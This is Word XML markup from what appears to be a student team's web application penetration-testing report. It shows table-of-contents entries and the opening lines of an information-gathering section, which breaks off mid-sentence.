                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Recommendations</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100261 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>87</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1CFF020C" w14:textId="35E346B5" w:rsidR="00FF7D56" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="440"/>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc94100262" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Report Contributions</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100262 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>88</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7DFE47EB" w14:textId="224A6DEF" w:rsidR="00FF7D56" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="440"/>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc94100263" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Team Reflection</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100263 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>90</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1F1A001A" w14:textId="0FC92752" w:rsidR="00FF7D56" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="440"/>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc94100264" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Individual Reflection</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100264 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>93</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0BD75D67" w14:textId="24920125" w:rsidR="00E700EE" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:sectPr w:rsidR="00E700EE" w:rsidSect="0019315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hyperlink w:anchor="_Toc94100265" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.1</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Kok Jia Cheng, Glenn</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100265 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>93</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="08C632A5" w14:textId="62F888BB"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66" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.2</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Colin Foo Chi Yang</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100266 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>98</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="36919D90" w14:textId="309002DD"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67" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.3</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Tan Yi Qian</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100267 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>102</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0B566AF1" w14:textId="7610B577" w:rsidR="00FF7D56" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc94100268" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendices</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100268 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>105</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0D5159EC" w14:textId="4060E35A" w:rsidR="00FF7D56" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="660"/>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc94100269" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>A.</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Severity Ranking Table</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100269 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>105</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="04F37952" w14:textId="6EDCE51A" w:rsidR="00FF7D56" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="660"/>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc94100270" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>B.</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>OWASP ZAP Setup</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100270 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>106</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0B81F651" w14:textId="63D25363" w:rsidR="00FF7D56" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc94100271" w:history="1">
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>C.</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:val="en-SG" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56" w:rsidRPr="00BB514B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Databases and Tables</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc94100271 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0028456E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>110</w:t>
            </w:r>
            <w:r w:rsidR="00FF7D56">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A6028E7" w14:textId="13D32565" w:rsidR="00902F70" w:rsidRDefault="00082A7F" w:rsidP="0045E736">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
              <w:tab w:val="left" w:pos="660"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="34EB4F7F" w14:textId="360E1244" w:rsidR="001D4643" w:rsidRDefault="001D4643"/>
    <w:p w14:paraId="6BC4F08C" w14:textId="27F71562" w:rsidR="00316EEF" w:rsidRDefault="00316EEF">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFC29C4" w14:textId="6C1AE4B8" w:rsidR="001A0FBE" w:rsidRDefault="00B6523E" w:rsidP="00CF2E38">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc93487276"/>
      <w:bookmarkStart w:id="2" w:name="_Toc93502851"/>
      <w:bookmarkStart w:id="3" w:name="_Toc93526884"/>
      <w:bookmarkStart w:id="4" w:name="_Toc94100213"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Information Findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="1419EBF2" w14:textId="6769C37D" w:rsidR="00C743E0" w:rsidRDefault="00A051A6" w:rsidP="003132EA">
      <w:r>
        <w:t>Through the usage of various tools</w:t>
      </w:r>
      <w:r w:rsidR="0067516E">
        <w:t xml:space="preserve"> and publicly available information, this section </w:t>
      </w:r>
      <w:r w:rsidR="005315C7">
        <w:t>will</w:t>
      </w:r>
      <w:r w:rsidR="00E040E8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0067516E">
        <w:t xml:space="preserve">discuss about the </w:t>
      </w:r>
      <w:r w:rsidR="00E040E8">
        <w:t xml:space="preserve">different methods and approach used </w:t>
      </w:r>
      <w:r w:rsidR="00EE7113">
        <w:t xml:space="preserve">for information gathering and </w:t>
      </w:r>
      <w:r w:rsidR="00B24638">
        <w:t>profiling</w:t>
      </w:r>
      <w:r w:rsidR="00EE7113">
        <w:t xml:space="preserve"> of the web application. Information collected in this </w:t>
      </w:r>
      <w:r w:rsidR="00147C07">
        <w:t xml:space="preserve">section </w:t>
      </w:r>
      <w:r w:rsidR="00DF0D3E">
        <w:t>would be</w:t>
      </w:r>
      <w:r w:rsidR="00A6709C">
        <w:t xml:space="preserve"> thoroughly documented </w:t>
      </w:r>
      <w:r w:rsidR="00CB64A7">
        <w:t>along with the tools used</w:t>
      </w:r>
      <w:r w:rsidR="00BC55DE">
        <w:t xml:space="preserve"> and challenges faced</w:t>
      </w:r>
      <w:r w:rsidR="00CB64A7">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486D9633" w14:textId="21542C4B" w:rsidR="00370CCC" w:rsidRDefault="00370CCC" w:rsidP="003132EA">
      <w:r>
        <w:t xml:space="preserve">The IP address of the remote server needs to </w:t>
      </w:r>
